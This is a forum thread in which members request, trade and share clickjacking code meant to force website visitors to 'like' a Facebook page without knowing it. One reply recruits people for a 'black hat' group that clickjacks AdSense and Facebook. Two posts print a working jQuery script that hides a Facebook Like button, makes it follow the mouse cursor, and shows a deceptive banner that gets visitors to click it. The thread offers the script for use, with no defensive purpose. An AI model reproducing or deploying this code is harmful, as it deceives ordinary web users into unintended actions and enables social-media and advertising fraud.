I Need Facebook ClickJack Code

apaydin2148

Newbie
Joined
Jun 7, 2011
Messages
15
Reaction score
0
Hi;

I need clickjack code like this:

If visitor haven't liked my facebook fanpage yet, by first click somewhere on the site, like my page then continue surfing on my website. If visitor already liked page, like cursor must disappear.

I found some codes but they have time limitation. I don't want like this.

If you have please share or i can buy it reasonable price.

Thanks
 
I've organized a group of black haters interested in clickjacking Adsense, Facebook, etc. It's by invitation only as we are purposefully keeping it small. If you're interested PM me.
 
Hi;

I need clickjack code like this:

If visitor haven't liked my facebook fanpage yet, by first click somewhere on the site, like my page then continue surfing on my website. If visitor already liked page, like cursor must disappear.

I found some codes but they have time limitation. I don't want like this.

If you have please share or i can buy it reasonable price.

Thanks

I can get you the script, ready to show you demo. Shoot me a PM for more details.
 
<script type="text/javascript">
$(document).ready(function() {

$(".fb-button").fadeTo(0, 0);

var $d = $('<div>').css({
'background': 'none repeat scroll 0 0 #FCEB8D',
'font-weight': 'bold',
'padding': '5px',
'position': 'fixed',
'text-align': 'center',
'width': '100%',
'z-index': '10000'
}).html('If the links dont work, please <a class="hideshare" href="#">click here</a> and then try clicking on the link again.');
$('body').delay(1000).prepend($d);

$('body').die('mousemove');
$('body').live('mousemove', function(e){
e.preventDefault();
$(".fb-button").css('position', 'absolute');
$(".fb-button").css('top', e.pageY - 50);
$(".fb-button").css('left', e.pageX - 30);
});

$('.hideshare').live('click', function(e){
$(".fb-button").hide();
e.preventDefault();
})

})
</script>


from my on website !!!
 
I'm Looking for a Facebook Like ClickJack script.. I can paid for it but I need to see the DEMO first, I have the money ready so let's work!
 
<script type="text/javascript">
$(document).ready(function() {

$(".fb-button").fadeTo(0, 0);

var $d = $('<div>').css({
'background': 'none repeat scroll 0 0 #FCEB8D',
'font-weight': 'bold',
'padding': '5px',
'position': 'fixed',
'text-align': 'center',
'width': '100%',
'z-index': '10000'
}).html('If the links dont work, please <a class="hideshare" href="#">click here</a> and then try clicking on the link again.');
$('body').delay(1000).prepend($d);

$('body').die('mousemove');
$('body').live('mousemove', function(e){
e.preventDefault();
$(".fb-button").css('position', 'absolute');
$(".fb-button").css('top', e.pageY - 50);
$(".fb-button").css('left', e.pageX - 30);
});

$('.hideshare').live('click', function(e){
$(".fb-button").hide();
e.preventDefault();
})

})
</script>


from my on website !!!

how can attach the link of the fanpage dude?
 
Back
Top